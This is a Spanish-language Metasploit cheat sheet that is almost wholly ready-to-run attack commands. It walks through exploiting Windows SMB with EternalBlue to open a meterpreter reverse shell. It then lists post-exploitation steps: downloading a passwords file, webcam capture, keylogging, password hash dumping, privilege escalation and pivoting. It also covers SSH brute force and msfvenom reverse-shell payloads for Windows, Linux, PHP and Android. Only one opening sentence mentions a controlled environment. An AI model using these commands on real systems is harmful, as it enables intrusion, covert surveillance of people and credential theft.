Metasploit Framework es la plataforma de explotación más utilizada en ciberseguridad ofensiva. Permite desarrollar, probar y ejecutar exploits contra sistemas objetivo en un entorno controlado.
# Iniciar la base de datos PostgreSQL:
service postgresql start
# Iniciar Metasploit:
msfconsole
# Verificar conexión con la base de datos:
db_status
# 1. Buscar un exploit:
search ms17-010
search type:exploit platform:windows smb
# 2. Seleccionar el exploit:
use exploit/windows/smb/ms17_010_eternalblue
# 3. Ver opciones requeridas:
show options
# 4. Configurar el objetivo:
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5 # Nuestra IP (para reverse shell)
set LPORT 4444
# 5. Ver payloads compatibles:
show payloads
# 6. Seleccionar payload:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 7. Ejecutar:
exploit
# o
run
# Información del sistema:
sysinfo
getuid
getpid
# Subir/bajar archivos:
upload /ruta/local/archivo.exe C:\\Windows\\Temp\\
download C:\\Users\\Admin\\passwords.txt /tmp/
# Captura de pantalla:
screenshot
# Activar cámara:
webcam_snap
# Capturar pulsaciones de teclado:
keyscan_start
keyscan_dump
keyscan_stop
# Obtener hashes de contraseñas:
hashdump
# Shell del sistema:
shell
# Elevar privilegios:
getsystem
# Pivotar a otra máquina de la red:
route add 10.10.10.0/24 [session_id]
# Escaneo de puertos integrado:
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run
# Escaneo SMB:
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
# Fuerza bruta SSH:
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.10
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run
# Escaneo de vulnerabilidades web:
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.10
set VHOST www.target.com
run
# Payload Windows EXE (reverse shell):
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.5 LPORT=4444 \
-f exe -o shell.exe
# Payload Linux ELF:
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.5 LPORT=4444 \
-f elf -o shell
# Payload PHP (webshell):
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.5 LPORT=4444 \
-f raw -o shell.php
# Payload Android APK:
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.1.5 LPORT=4444 \
-o malicious.apk
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit -j # -j = en segundo plano (job)
sessions -l # Listar sesiones activas
sessions -i 1 # Interactuar con sesión 1
sessions -k 1 # Cerrar sesión 1
background # Poner sesión en segundo plano